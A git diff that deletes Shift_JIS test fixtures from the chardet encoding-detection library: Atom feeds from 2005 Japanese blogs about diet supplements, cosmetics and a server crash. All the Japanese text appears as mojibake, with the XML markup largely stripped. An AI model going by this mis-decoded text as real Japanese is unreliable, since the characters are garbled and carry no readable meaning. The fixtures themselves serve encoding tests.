    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/nextbeaut.com.xml b/chardet/tests/SHIFT_JIS/nextbeaut.com.xml deleted file mode 100644 index f73b47f..0000000 --- a/chardet/tests/SHIFT_JIS/nextbeaut.com.xml +++ /dev/null @@ -1,347 +0,0 @@ - - - -ƒ_ƒCƒGƒbƒgƒTƒvƒƒƒ“ƒg’”ּƒuƒƒOyƒRƒGƒ“ƒUƒCƒ€‚p‚P‚OEƒ¿ƒƒ|_E‚k|ƒJƒ‹ƒjƒ`ƒ“z - -2005-12-30T08:39:50Z - -tag:www.nextbeaut.com,2005:/mt//2 -Movable Type -Copyright (c) 2005, beaut - -SUINA ƒXƒCƒiƒEƒH[ƒ^ƒ‹ - -2005-12-30T08:39:50Z -2005-12-30T08:39:29Z -tag:www.nextbeaut.com,2005:/mt//2.583 -2005-12-30T08:39:29Z -‚ֲ‚¢‚ֹ‚Q‚ֲ‚ּ“ֱ‹–‚׉נ‹ײIII “ֱ‹–¬•×A“ֱ‹–‹Zp‚נg‚ֱ‚½‚v“ֱ‹–‚ּ‘S‚­V‚µ‚¢‰»ֿ…ISUINA ƒXƒCƒiƒEƒH[ƒ^ƒ‹ ‚ה‚ֵ‚½‚‚²‚ּ‚ז‚₪‚ֹƒcƒ‹ƒcƒ‹‚ֹ‚ָ‚ך‚יBlװ‚ֹ‚ָ‚¶‚A‚·‚®‚ֹ”§‚ֹg‚ם‚ך‚יAװ‚¿‚ב‚ס‚נ•ן‚w—r... - -beaut - -web@hbm-life.net - -‰»ֿ•i@”—e - -‚ֲ‚¢‚ֹ‚Q‚ֲ‚ּ“ֱ‹–‚׉נ‹ײIII “ֱ‹–¬•×A“ֱ‹–‹Zp‚נg‚ֱ‚½‚v“ֱ‹–‚ּ‘S‚­V‚µ‚¢‰»ֿ…ISUINA ƒXƒCƒiƒEƒH[ƒ^ƒ‹

    - -

    ‚ה‚ֵ‚½‚‚²‚ּ‚ז‚₪‚ֹƒcƒ‹ƒcƒ‹‚ֹ‚ָ‚ך‚יBlװ‚ֹ‚ָ‚¶‚A‚·‚®‚ֹ”§‚ֹg‚ם‚ך‚יAװ‚¿‚ב‚ס‚נ•ן‚w—r…x‚ֹ‹ֹ‚‚ִ‹‚¢Aƒ[ƒ[ף‰»ֿ…Bƒlƒbƒgsך‚ֵ‚ּזs”ּ”„‚׈’טIII
    -SUINA ƒXƒCƒiƒEƒH[ƒ^ƒ‹

    - -

    SUINA ƒXƒCƒiƒEƒH[ƒ^ƒ‹@(‚a)y”—e’N₪•iEƒRƒ“ƒ^ƒNƒgƒƒ“ƒYE‰ֶ“dך–ו“XBlue-Lagoonz

    ]]> - -
    -
    - -XAFFAiƒTƒtƒ@jƒQƒ‹ƒNƒ[ƒ€ - -2005-12-26T04:01:50Z -2005-12-26T03:54:32Z -tag:www.nextbeaut.com,2005:/mt//2.582 -2005-12-26T03:54:32Z -‚א‚₪A‚₪‚י‚¨‚¢“¦‚ׂ³‚ָ‚¢B–Z‚µ‚¢’©‚א‚±‚ך‚׀‚ֶ‚ֲ‚ֵy‚¨טyz•y®ארzƒXƒLƒ“ƒPƒA ... - -beaut - -web@hbm-life.net - -‰»ֿ•i@”—e - -‚א‚₪A‚₪‚י‚¨‚¢“¦‚ׂ³‚ָ‚¢B–Z‚µ‚¢’©‚א‚±‚ך‚׀‚ֶ‚ֲ‚ֵy‚¨טyz•y®ארzƒXƒLƒ“ƒPƒA

    - -

    yXAFFAiƒTƒtƒ@jƒQƒ‹ƒNƒ[ƒ€z‚א‚₪A‚₪‚י‚¨‚¢“¦‚ׂ³‚ָ‚¢B–Z‚µ‚¢’©‚א‚±‚ך‚׀‚ֶ‚ֲ‚ֵy‚¨טyz•y®ארzƒXƒLƒ“ƒPƒAy‚±‚ך‚±‚ך‹הy•”z

    ]]> - -
    -
    - -ƒoƒWƒ‹ƒ_ƒCƒGƒbƒgƒV[ƒh - -2005-12-23T01:58:25Z -2005-12-23T01:56:53Z -tag:www.nextbeaut.com,2005:/mt//2.581 -2005-12-23T01:56:53Z -˜b‘ט•¦“«ƒ_ƒCƒGƒbƒg‘fuƒoƒWƒ‹ƒV[ƒhvB‚¨‚ָ‚¶‚‚ּƒn[ƒuAƒoƒWƒ‹‚ּם‚ֵ‚·BƒoƒWƒ‹ƒ_ƒCƒGƒbƒgƒV[ƒh ˜b‘ט•¦“«ƒ_ƒCƒGƒbƒg‘fuƒoƒWƒ‹ƒV[ƒhvB‚¨‚ָ‚¶‚‚ּƒn[ƒuAƒoƒWƒ‹‚ּם‚ֵ‚·B …‚נ‚‚ֶ‚R‚O”{‚ֹ‚א–c‚ח‚... - -beaut - -web@hbm-life.net - -‚¨‚·‚·‚ƒ_ƒCƒGƒbƒg - -˜b‘ט•¦“«ƒ_ƒCƒGƒbƒg‘fuƒoƒWƒ‹ƒV[ƒhvB‚¨‚ָ‚¶‚‚ּƒn[ƒuAƒoƒWƒ‹‚ּם‚ֵ‚·BƒoƒWƒ‹ƒ_ƒCƒGƒbƒgƒV[ƒh

    - -

    ˜b‘ט•¦“«ƒ_ƒCƒGƒbƒg‘fuƒoƒWƒ‹ƒV[ƒhvB‚¨‚ָ‚¶‚‚ּƒn[ƒuAƒoƒWƒ‹‚ּם‚ֵ‚·B
    -…‚נ‚‚ֶ‚R‚O”{‚ֹ‚א–c‚ח‚‚ּ‚ֵA‚¨D‚«‚ָˆש‚•¨‚ג—¿—‚ֹ¬‚÷‚י‚¾‚¯‚ֵ–• ´‚ד¾‚ח‚ךA¦“V‚נ—½‚®H•¨‘@ˆ—‚ֵƒJƒƒ[ƒJƒbƒg‚ג‚¨’‚¶‰‘P‚ֹ‚אˆ׀—ֽ‚נ”­צ‚·‚י‹ֱˆ‚ּם‚ֵ‚·B

    - -

    ƒoƒWƒ‹ƒ_ƒCƒGƒbƒgƒV[ƒh(B)y”—e’N₪•iEƒRƒ“ƒ^ƒNƒgƒƒ“ƒYE‰ֶ“dך–ו“XBlue-Lagoonz

    ]]> - -
    -
    - -ֱ‚µ‚½‚¢–ׁE¬ƒWƒB”§‚ּ‰“‚ׂ׀‚ֶ“h‚ט‚ֵ‚ֲ‚י‚י‚סƒtƒFƒCƒXפƒƒCƒN‚³‚ס‚ּ”§ƒpƒe - -2005-12-19T04:06:54Z -2005-12-19T04:04:40Z -tag:www.nextbeaut.com,2005:/mt//2.580 -2005-12-19T04:04:40Z -E‹C‚ֹ‚ָ‚י‰“”§‚נ‚ֲ‚י‚י‚ס”§‚ֹ ’´”ק—±qƒpƒEƒ_[‚×–ׁ‚ג¬‚¶‚ם‚ּa‚ֹ“‚ט‚u‚ֹƒJƒo[B ... - -beaut - -web@hbm-life.net - -‰»ֿ•i@”—e - -E‹C‚ֹ‚ָ‚י‰“”§‚נ‚ֲ‚י‚י‚ס”§‚ֹ
    -’´”ק—±qƒpƒEƒ_[‚×–ׁ‚ג¬‚¶‚ם‚ּa‚ֹ“‚ט‚u‚ֹƒJƒo[B

    - -

    ֱ‚µ‚½‚¢–ׁE¬ƒWƒB”§‚ּ‰“‚ׂ׀‚ֶ“h‚ט‚ֵ‚ֲ‚י‚י‚סƒtƒFƒCƒXפƒƒCƒN‚³‚ס‚ּ”§ƒpƒey”Y‚ƒPƒA@‚s‚`‚l‚`‚j‚n‹הy•”z

    ]]> - -
    -
    - -ƒhƒ~[ƒiƒ}ƒgƒƒbƒNƒX - -2005-12-15T03:07:03Z -2005-12-15T02:59:45Z -tag:www.nextbeaut.com,2005:/mt//2.579 -2005-12-15T02:59:45Z -i‰»‚µ‚½ƒRƒGƒ“ƒUƒCƒ€Q10‚ֹL-ƒJƒ‹ƒjƒ`ƒ“AƒJƒeƒLƒ“AƒRƒ‰[ƒQƒ“₪ƒqƒAƒ‹ƒƒ“_‚ָ‚ַ‚נƒvƒ‰ƒXI ... - -beaut - -web@hbm-life.net - -ƒqƒAƒ‹ƒƒ“_ - -i‰»‚µ‚½ƒRƒGƒ“ƒUƒCƒ€Q10‚ֹL-ƒJƒ‹ƒjƒ`ƒ“AƒJƒeƒLƒ“AƒRƒ‰[ƒQƒ“ƒqƒAƒ‹ƒƒ“_‚ָ‚ַ‚נƒvƒ‰ƒXI

    - -

    ƒhƒ~[ƒiƒ}ƒgƒƒbƒNƒXy‘——¿–³—¿zy‚g‚a‚lƒ‰ƒCƒtƒlƒbƒgz

    ]]> - -
    -
    - -ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_ - -2005-12-13T01:23:13Z -2005-12-13T01:19:06Z -tag:www.nextbeaut.com,2005:/mt//2.578 -2005-12-13T01:19:06Z -ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_‚ֽ20ם—‚ ‚יƒAƒ~ƒm_‚ּ‚׀‚ֶ‚ֲAƒOƒ‹ƒ^ƒ~ƒ“_‚×½‚ּ‚ז‚₪‚ֹq‚ׂט‡‚ֱ‚½¬•ֵׂAƒAƒ~ƒm_‚ּ’†‚ֵ‚א‚ֶ‚­‚ֹ‚¨”§‚ײ‚ּ•¼ר‰‚ׂ‚¢¬•ֵׂ‚·B ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_‚ּ“ֱ’¥‚ֽAƒTƒvƒƒƒ“ƒg‚ג’ֻ‚ֵ‚ּ•–@... - -beaut - -web@hbm-life.net - -ƒqƒAƒ‹ƒƒ“_ - -ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_‚ֽ20ם—‚ ‚יƒAƒ~ƒm_‚ּ‚׀‚ֶ‚ֲAƒOƒ‹ƒ^ƒ~ƒ“_‚×½‚ּ‚ז‚₪‚ֹq‚ׂט‡‚ֱ‚½¬•ֵׂAƒAƒ~ƒm_‚ּ’†‚ֵ‚א‚ֶ‚­‚ֹ‚¨”§‚ײ‚ּ•¼ר‰‚ׂ‚¢¬•ֵׂ‚·B
    -ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_‚ּ“ֱ’¥‚ֽAƒTƒvƒƒƒ“ƒg‚ג’ֻ‚ֵ‚ּ•–@‚ֹ‚ז‚ֱ‚ִ‚‚¢ר‰‚ד¾‚ח‚ך‚יƒRƒ‰[ƒQƒ“‚גƒqƒAƒ‹ƒƒ“_‚ֶ‚ֽˆב‚¢A¬•ּׂ•×q‚נ¬‚³‚­i’ב•×q‰»j‚³‚¹‚י‚¾‚¯‚ֵA‚¨”§“א‘₪‚ּ•…׳–E‚ֹ’¼“­‚«‚©‚¯‚י‚±‚ֶ‚ֵׂ‚«‚‚·B
    -‚ֲ‚‚טAƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_‚×”­©‚³‚ך‚½‚±‚ֶ‚ֵA‚±‚ך‚‚ֵ‚ּ•¼•–@‚ֶ‚ֽˆב‚₪AV‚µ‚¢•¼•–@‚×¶‚‚ך‚½‚ּ‚ֵ‚·B

    - -

    ƒ|ƒƒOƒ‹ƒ^ƒ~ƒ“_y‘——¿–³—¿zy‚g‚a‚lƒ‰ƒCƒtƒlƒbƒgz

    ]]> - -
    -
    - -‹†‹ֹƒmƒRƒMƒƒ„ƒVƒGƒLƒX - -2005-12-12T02:13:23Z -2005-12-12T02:11:36Z -tag:www.nextbeaut.com,2005:/mt//2.577 -2005-12-12T02:11:36Z -1—±’†‚ֹƒmƒRƒMƒƒ„ƒVƒGƒLƒX‚נ345mg”z‡BƒgƒCƒ‚׋C‚ֹ‚ָ‚י’†‚”N‚ּ•‚ֹ‚¨‚·‚·‚’NH•i‚ֵ‚·B ... - -beaut - -web@hbm-life.net - -ƒmƒRƒMƒƒ„ƒVƒGƒLƒX - -1—±’†‚ֹƒmƒRƒMƒƒ„ƒVƒGƒLƒX‚נ345mg”z‡BƒgƒCƒ‚׋C‚ֹ‚ָ‚י’†‚”N‚ּ•‚ֹ‚¨‚·‚·‚’NH•i‚ֵ‚·B

    - -

    ‹†‹ֹƒmƒRƒMƒƒ„ƒVƒGƒLƒXy‘——¿–³—¿zy‚g‚a‚lƒ‰ƒCƒtƒlƒbƒgz

    ]]> - -
    -
    - -˜V’ֲ| - -2005-12-10T03:03:30Z -2005-12-10T03:01:53Z -tag:www.nextbeaut.com,2005:/mt//2.576 -2005-12-10T03:01:53Z -|‚נˆש‚‚־u”ז˜J‰ס•vuƒ_ƒCƒGƒbƒgvu‰tע‰»v‚ָ‚ַ‚ָ‚ַƒAƒ~ƒm_ר‰‚ּ‰¶b‚ֹ—^‚ך‚‚·B ... - -beaut - -web@hbm-life.net - -‚¨‚·‚·‚ƒ_ƒCƒGƒbƒg - -|‚נˆש‚‚־u”ז˜J‰ס•vuƒ_ƒCƒGƒbƒgvu‰tע‰»v‚ָ‚ַ‚ָ‚ַƒAƒ~ƒm_ר‰‚ּ‰¶b‚ֹ—^‚ך‚‚·B

    - -

    ˜V’ֲ|yƒ‰ƒCƒtƒAƒbƒvƒIƒ“ƒ‰ƒCƒ“ƒVƒ‡ƒbƒsƒ“ƒOz

    ]]> - -
    -
    - -ƒrƒrƒbƒhƒvƒ‰ƒXƒlƒI2ֲƒZƒbƒg - -2005-12-08T01:41:39Z -2005-12-08T01:40:24Z -tag:www.nextbeaut.com,2005:/mt//2.575 -2005-12-08T01:40:24Z -‘ּ‰–b₪‹†ƒ`[ƒ€‚׃AƒXƒ[ƒg‚ּ’Zתװƒ_ƒCƒGƒbƒgƒvƒƒOƒ‰ƒ€‚ֶ—L_‘f‰^“®´—‚ֹמ‚ֳ‚¢‚ִ₪‹†‚ְֶ±‚נd‚ֻA‚ֲ‚¢‚ֹƒTƒvƒ‰»‚ֹ¬קI‚‚ס‚ּ‚ם‚¸‚©‚ָ“תם‚ּ“®ל‚ֵ‚·‚®‰–b‚׃Gƒlƒ‹ƒM[‚ֹ‚ָ‚י‰זת“IƒTƒvƒ‚ֵ‚·B ... - -beaut - -web@hbm-life.net - -‚¨‚·‚·‚ƒ_ƒCƒGƒbƒg - -‘ּ‰–b₪‹†ƒ`[ƒ€‚׃AƒXƒ[ƒg‚ּ’Zתװƒ_ƒCƒGƒbƒgƒvƒƒOƒ‰ƒ€‚ֶ—L_‘f‰^“®´—‚ֹמ‚ֳ‚¢‚ִ₪‹†‚ְֶ±‚נd‚ֻA‚ֲ‚¢‚ֹƒTƒvƒ‰»‚ֹ¬קI‚‚ס‚ּ‚ם‚¸‚©‚ָ“תם‚ּ“®ל‚ֵ‚·‚®‰–b‚׃Gƒlƒ‹ƒM[‚ֹ‚ָ‚י‰זת“IƒTƒvƒ‚ֵ‚·B

    - -

    yƒrƒrƒbƒhƒvƒ‰ƒXƒlƒI2ֲƒZƒbƒgzV¬•×uƒAƒJƒVƒ‡ƒEƒ}ƒGƒLƒXv”z‡I  ˆש‚‚¾‚¯‚ֵ‚ ‚ָ‚½‚ּ‘ּ‚נƒ_ƒCƒGƒbƒgƒ‚[ƒhi—L_‘f‰^“®ף‘װj‚ֹƒVƒtƒg‚³‚¹A‰–b‚נ‘¬‚­E‘½‚­”Rִ‚³‚¹‚יƒTƒvƒ‚ֵ‚·By‚±‚ך‚±‚ך‹הy•”z

    ]]> - -
    -
    - -ƒoƒ‰ƒ“ƒXƒTƒvƒEƒtƒH[ƒƒfƒB - -2005-12-06T03:00:40Z -2005-12-06T02:58:15Z -tag:www.nextbeaut.com,2005:/mt//2.574 -2005-12-06T02:58:15Z -ƒn[ƒu”z‡¬•ּׂ“­‚«‚ֵ—«‚ח‚µ‚³‚נ—D‚µ‚­®‚¦‚יƒTƒvƒ‚ֵ‚· ... - -beaut - -web@hbm-life.net - -ƒTƒvƒƒƒ“ƒg - -ƒn[ƒu”z‡¬•ּׂ“­‚«‚ֵ—«‚ח‚µ‚³‚נ—D‚µ‚­®‚¦‚יƒTƒvƒ‚ֵ‚·

    - -

    ƒn[ƒu”z‡¬•ּׂ“­‚«‚ֵ—«‚ח‚µ‚³‚נ—D‚µ‚­®‚¦‚יƒTƒvƒ‚ֵ‚· ƒoƒ‰ƒ“ƒXƒTƒvƒEƒtƒH[ƒƒfƒBy@ƒoƒ‰ƒGƒeƒBƒVƒ‡ƒbƒvy‚ֻ‚ֻ‚גzƒ_ƒCƒGƒbƒgE”—eE’NE‚»‚ּ‘¼זˆµz

    ]]> - -
    -
    - -y•ךƒGƒLƒX - -2005-12-06T02:55:18Z -2005-12-01T02:52:43Z -tag:www.nextbeaut.com,2005:/mt//2.573 -2005-12-01T02:52:43Z -yy•ךƒGƒLƒXzƒOƒ‹ƒ^ƒ`ƒIƒ“iƒVƒXƒeƒCƒ“ƒyƒvƒ`ƒhj‚׈ש‚ס‚ֵ”ז‚ך‚½‚©‚ס‚¼‚₪‚נ•ל ... - -beaut - -web@hbm-life.net - -ƒTƒvƒƒƒ“ƒg - -yy•ךƒGƒLƒXzƒOƒ‹ƒ^ƒ`ƒIƒ“iƒVƒXƒeƒCƒ“ƒyƒvƒ`ƒhj‚׈ש‚ס‚ֵ”ז‚ך‚½‚©‚ס‚¼‚₪‚נ•ל

    - -

    yy•ךƒGƒLƒXzƒOƒ‹ƒ^ƒ`ƒIƒ“iƒVƒXƒeƒCƒ“ƒyƒvƒ`ƒhj‚׈ש‚ס‚ֵ”ז‚ך‚½‚©‚ס‚¼‚₪‚נ•ל ‚©‚ס‚¼‚₪‘וby@ƒoƒ‰ƒGƒeƒBƒVƒ‡ƒbƒvy‚ֻ‚ֻ‚גzƒ_ƒCƒGƒbƒgE”—eE’NE‚»‚ּ‘¼זˆµz

    ]]> - -
    -
    - -‹†‹ֹ”[“₪ƒLƒi[ƒ[y‘——¿–³—¿z - -2005-11-28T08:54:20Z -2005-11-28T08:50:06Z -tag:www.nextbeaut.com,2005:/mt//2.572 -2005-11-28T08:50:06Z -ƒhƒƒhƒ‚׋C‚ֹ‚ָ‚י’†‚”N‚ּ•‚ֹII’–ƒTƒ‰ƒTƒ‰¬•×”z‡ ‹†‹ֹ”[“₪ƒLƒi[ƒ[‚ֽA”[“₪‹”|—{ƒGƒLƒX(ƒiƒbƒgƒEƒLƒi[ƒ[—L)‚ֹAƒuƒhƒEםq’o•¨AƒCƒ`ƒ‡ƒE—tƒGƒLƒX––AƒAƒXƒ^ƒLƒTƒ“ƒ`ƒ“‚נ”z‡‚µ‚½’NH•i‚ֵ‚·B”[... - -beaut - -web@hbm-life.net - -”[“₪ƒLƒi[ƒ[ - -ƒhƒƒhƒ‚׋C‚ֹ‚ָ‚י’†‚”N‚ּ•‚ֹII’–ƒTƒ‰ƒTƒ‰¬•×”z‡

    - -

    ‹†‹ֹ”[“₪ƒLƒi[ƒ[‚ֽA”[“₪‹”|—{ƒGƒLƒX(ƒiƒbƒgƒEƒLƒi[ƒ[—L)‚ֹAƒuƒhƒEםq’o•¨AƒCƒ`ƒ‡ƒE—tƒGƒLƒX––AƒAƒXƒ^ƒLƒTƒ“ƒ`ƒ“‚נ”z‡‚µ‚½’NH•i‚ֵ‚·B”[“₪‚ֹ‚‚ך‚יƒrƒ^ƒ~ƒ“K2A”[“₪‹‚ֽ‹‚³‚ך‚ִ‚¢‚‚·B–ˆ“ת‚ּ’Nˆ‚ֹ‚¨–נ—§‚ִ‰÷‚³‚¢B

    - -


    -‹†‹ֹ”[“₪ƒLƒi[ƒ[y‘——¿–³—¿zy‚g‚a‚lƒ‰ƒCƒtƒlƒbƒgz

    ]]> - -
    -
    - -ƒUƒCƒNƒ‹ƒXƒƒ~ƒ“ƒOƒWƒFƒ‹Eƒzƒbƒg‚QֲƒZƒbƒg - -2005-11-26T00:27:40Z -2005-11-26T00:26:26Z -tag:www.nextbeaut.com,2005:/mt//2.571 -2005-11-26T00:26:26Z -ƒƒfƒBƒXƒeƒ[ƒ‹‚׉–b‚נ•׉נ‚נ‘£iI“א•”‰–b‚נ¸‚ח‚·ƒWƒFƒ‹I•”•׃„ƒZ‚ֹ‚¨©‚‚ֵ‚·B ... - -beaut - -web@hbm-life.net - -‚¨‚·‚·‚ƒ_ƒCƒGƒbƒg - -ƒƒfƒBƒXƒeƒ[ƒ‹‚׉–b‚נ•׉נ‚נ‘£iI“א•”‰–b‚נ¸‚ח‚·ƒWƒFƒ‹I•”•׃„ƒZ‚ֹ‚¨©‚‚ֵ‚·B

    - -


    -yƒUƒCƒNƒ‹ƒXƒƒ~ƒ“ƒOƒWƒFƒ‹Eƒzƒbƒg‚QֲƒZƒbƒgzƒƒfƒBƒXƒeƒ[ƒ‹‚׉–b‚נ•׉נ‚נ‘£iI“א•”‰–b‚נ¸‚ח‚·ƒWƒFƒ‹I•”•׃„ƒZ‚ֹ‚¨©‚‚ֵ‚·By‚±‚ך‚±‚ך‹הy•”z

    ]]> - -
    -
    - -‚f‚n‚k‚cƒRƒGƒ“ƒUƒCƒ€‚p‚P‚O - -2005-11-24T09:03:36Z -2005-11-24T09:01:26Z -tag:www.nextbeaut.com,2005:/mt//2.570 -2005-11-24T09:01:26Z -‚ז‚טƒnƒCƒƒxƒ‹‚ּ’N‚ֶ”—e‚נƒTƒ|[ƒg‚·‚י‚½‚‚ֹAƒRƒGƒ“ƒUƒCƒ€‚p‚P‚O‚נ‚P—±’†‚P‚O‚Pmg‚ֶ’´‚”z‡I ‚³‚ח‚ֹƒAƒ“ƒ`ƒGƒCƒWƒ“ƒOƒpƒ[‚נל‚טo‚·ƒ¿ƒƒ|_‚ֶl‹C‚ּƒsƒNƒmƒWƒFƒm[ƒ‹‚נ‡‚ם‚¹‚‚µ‚½B ‚א‚ֱ‚ֶ‚א‚ֱ‚ֶ... - -beaut - -web@hbm-life.net - -ƒRƒGƒ“ƒUƒCƒ€‚p‚P‚O - -‚ז‚טƒnƒCƒƒxƒ‹‚ּ’N‚ֶ”—e‚נƒTƒ|[ƒg‚·‚י‚½‚‚ֹAƒRƒGƒ“ƒUƒCƒ€‚p‚P‚O‚נ‚P—±’†‚P‚O‚Pmg‚ֶ’´‚”z‡I
    -‚³‚ח‚ֹƒAƒ“ƒ`ƒGƒCƒWƒ“ƒOƒpƒ[‚נל‚טo‚·ƒ¿ƒƒ|_‚ֶl‹C‚ּƒsƒNƒmƒWƒFƒm[ƒ‹‚נ‡‚ם‚¹‚‚µ‚½B
    -‚א‚ֱ‚ֶ‚א‚ֱ‚ֶl¶‚נy‚µ‚‚½‚¢•‚ֹ‚¨©‚‚ּˆם•i‚ֵ‚·B

    - -


    -‚f‚n‚k‚cƒRƒGƒ“ƒUƒCƒ€‚p‚P‚Oy‚g‚a‚lƒ‰ƒCƒtƒlƒbƒgz

    ]]> - -
    -
    - -ƒvƒGƒ‰ƒƒAƒ~ƒƒtƒBƒJ100 - -2005-11-21T04:50:09Z -2005-11-21T04:48:25Z -tag:www.nextbeaut.com,2005:/mt//2.569 -2005-11-21T04:48:25Z -”’ƒKƒEƒNƒ‹ƒA‚P‚O‚O“‚ּ‚I©‘R‘f‚ֵˆְSƒoƒXƒgƒAƒbƒvI—«‚ח‚µ‚¢–£—ֽ“I‚ָƒJƒ‰ƒ_‚ײƒTƒ|[ƒgI ... - -beaut - -web@hbm-life.net - -ƒTƒvƒƒƒ“ƒg - -”’ƒKƒEƒNƒ‹ƒA‚P‚O‚O“‚ּ‚I©‘R‘f‚ֵˆְSƒoƒXƒgƒAƒbƒvI—«‚ח‚µ‚¢–£—ֽ“I‚ָƒJƒ‰ƒ_‚ײƒTƒ|[ƒgI

    - -


    -”’ƒKƒEƒNƒ‹ƒA‚P‚O‚O“‚ּ‚I©‘R‘f‚ֵˆְSƒoƒXƒgƒAƒbƒvI—«‚ח‚µ‚¢–£—ֽ“I‚ָƒJƒ‰ƒ_‚ײƒTƒ|[ƒgIyƒvƒGƒ‰ƒƒAƒ~ƒƒtƒBƒJ100zy–ג‰®‚³‚ס.netz

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/ooganemochi.com.xml b/chardet/tests/SHIFT_JIS/ooganemochi.com.xml deleted file mode 100644 index 2a14a18..0000000 --- a/chardet/tests/SHIFT_JIS/ooganemochi.com.xml +++ /dev/null @@ -1,72 +0,0 @@ - - - -ƒuƒƒO‚ֵ‘ו‹א‚¿ - -2005-10-03T05:32:05Z - -tag:www.ooganemochi.com,2005://1 -Movable Type -Copyright (c) 2005, seicha - -ƒT[ƒo[‚ֱ”ע‚ׁ‚¡`‚ּ - -2005-10-03T05:32:05Z -2005-10-03T05:12:31Z -tag:www.ooganemochi.com,2005://1.1 -2005-10-03T05:12:31Z -ƒIƒ}ƒKƒbI - -ƒT[ƒo[‚י‚ֱ”ע‚ׁ‚ג‚ׂט‚¡[‚‚ֱII -ƒTƒ‹ƒoƒgƒHƒ‚ֱII - -‚ ‚[A‚ג‚ח‚ך‚ִ‚‚ס‚ָׂA‚ֵ‚ס‚ָׂA‚¨‚‚ס‚ָׂA‚¨‚‚ס‚ח‚ה‚י‚³‚ס‚÷‚¢‚ֱ‚µ‚ס‚ּ‚‚₪‚ֵ‚·‚ָׂEEEQ|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|› - -‚‚¶‚ֱ‚·‚©H -‚A‚‚¶‚ֱ‚·‚©‚[IH -‚A‚A‚‚µ‚ֱ‚»‚ז‚§`פƒJƒ€ƒTƒnƒ€ƒjƒ_B‚‚³ƒnƒ€‚ֹ‚¾I - -seicha - - - - - -ƒIƒ}ƒKƒbI

    - -

    ƒT[ƒo[‚י‚ֱ”ע‚ׁ‚ג‚ׂט‚¡[‚‚ֱII
    -ƒTƒ‹ƒoƒgƒHƒ‚ֱII

    - -

    ‚ ‚[A‚ג‚ח‚ך‚ִ‚‚ס‚ָׂA‚ֵ‚ס‚ָׂA‚¨‚‚ס‚ָׂA‚¨‚‚ס‚ח‚ה‚י‚³‚ס‚÷‚¢‚ֱ‚µ‚ס‚ּ‚‚₪‚ֵ‚·‚ָׂEEEQ|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|›Q|P|›

    - -

    ‚‚¶‚ֱ‚·‚©H
    -‚A‚‚¶‚ֱ‚·‚©‚[IH
    -‚A‚A‚‚µ‚ֱ‚»‚ז‚§`פƒJƒ€ƒTƒnƒ€ƒjƒ_B‚‚³ƒnƒ€‚ֹ‚¾I

    - -

    ƒoƒbƒNƒAƒbƒv‚א‚¿‚ב‚ס‚ֶז‚ך‚ִ‚ײ‚ס‚©‚ֱ‚½‚©‚חA‘S‹L–ƒp[‚ג‚µ‚ֱI
    -‚ג‚µA‚ג‚µA‚ג‚µAƒKƒj‚¡B‚¨AƒKƒj‚¡B‚¨‚§AƒKƒj‚¡B‚ג‚·‚¡ƒKƒj‚¡B

    - -

    ‚·‚ֱ‚©‚ט‚±‚ּƒTƒCƒg‚א‚ם‚¯‚ּ‚ם‚©‚ח‚ס‚±‚ֶ‚נ‚ּ‚½‚‚₪AƒXƒgƒƒX”­U‚ּך‚ֹ‚ָ‚ֱ‚ִ‚¨‚ט‚‚·‚×A–³‚­‚·–ף‚ֹ‚ֽ‚¢‚©‚ס‚ּ‚ֵ‚·‚ז‚§I

    - -

    ƒhƒƒCƒ“ז‚ֱ‚ִ‚¨‚י‚ס‚ֵ‚·‚ז‚§[I

    - -

    ‚¶‚ב‚©‚חA‚‚½‚A­‚µ‚¸‚ֲ‚£Aז’£‚ֱ‚ִ‚¥As‚±‚₪‚ֶ‚§Av‚ֱ‚ִ‚¥A‚¨‚ט‚‚·‚ֱI

    - -

    ‚¿‚ב‚ס‚ֶ‚µ‚½ƒTƒCƒg‚ֹ‚µ‚ז‚₪‚©‚ָ‚`A‚ֶv‚₪‚±‚ֶ‚א‚ ‚י‚ס‚ג‚¯‚ַ‚ֻ‚¥B
    -‚»‚ך‚ֽ‘¼‚ּƒTƒCƒg‚ֵ‚ג‚ֱ‚ִ‚‚·‚©‚ח‚‚ ‚ ‚ ‚ֱI‚ֹ‚ב‚ס‚ֻ‚סE‚[‚׃‚¥‚סE‚׃‚‚ס‚B‚‚ט‚¡‚ֱ‚׃‚¡[‚ס‚ֱI

    - -

    ‚¾A‘–‚¾‚A״‚ך‚ִ‚«‚ג‚ֱׂ‚½‚A‚ֽA‘‚­A‹zˆר‚µ‚ָ‚¢‚ֶEEEA•@‚©‚חA‹zˆר‚µ‚ָ‚¢‚ֶ‚§EEEB‰ף‚ך‚¿‚‚₪‚ּ‚÷‚¥‚¥‚¦‚¦‚¦‚ֱI‚÷‚¥‚ֱ‚׃‚¡[‚ס‚ֱB‚÷A‚÷A‚÷‚ֱ‚׃‚¥[‚סB

    - -

    •@‚©‚חAƒ\ƒ‹ƒtƒB[ƒ†‚נ‚§‚§‚¨‚¨‚ֱEEEEA‚‚‚ז‚ֱA‚­‚ֱB

    - -

    ‚¶‚בA‚»‚ה‚±‚ֶ‚ֵפ

    - -

    ‚ ‚A¡“ת‚אˆ׃–¡‚ׂם‚©‚ח‚ס‚©‚ֱ‚½‚B

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/SHIFT_JIS/perth-on.net.xml b/chardet/tests/SHIFT_JIS/perth-on.net.xml deleted file mode 100644 index 25876ab..0000000 --- a/chardet/tests/SHIFT_JIS/perth-on.net.xml +++ /dev/null @@ -1,60 +0,0 @@ - - - -ƒp[ƒXƒIƒ“ƒlƒbƒg - -2005-12-27T09:23:56Z -ƒp[ƒX‚ּ—¯w‚©‚ח¶ˆמ•ס‚‚ֵCO¶ˆ‚נƒTƒ|[ƒg‚µ‚‚·I -tag:www.perth-on.net,2005:/main//1 -Movable Type -Copyright (c) 2005, ambits - -–״“o‚ט‘ּ± - -2005-12-27T09:23:56Z -2005-12-27T09:21:02Z -tag:www.perth-on.net,2005:/main//1.174 -2005-12-27T09:21:02Z -u–״“o‚ט‘ּ±v 